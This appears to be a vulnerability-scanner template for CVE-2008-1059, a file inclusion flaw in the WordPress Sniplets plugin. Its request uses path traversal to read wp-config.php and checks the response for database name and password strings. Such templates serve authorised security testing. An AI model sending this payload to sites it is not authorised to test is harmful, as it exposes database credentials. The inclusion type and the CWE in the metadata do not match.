40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2008-1059
|
|
|
|
info:
|
|
name: WordPress Sniplets 1.1.2 - Local File Inclusion
|
|
author: dhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/5194
|
|
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
|
|
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2008-1059
|
|
cwe-id: CWE-79
|
|
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/29
|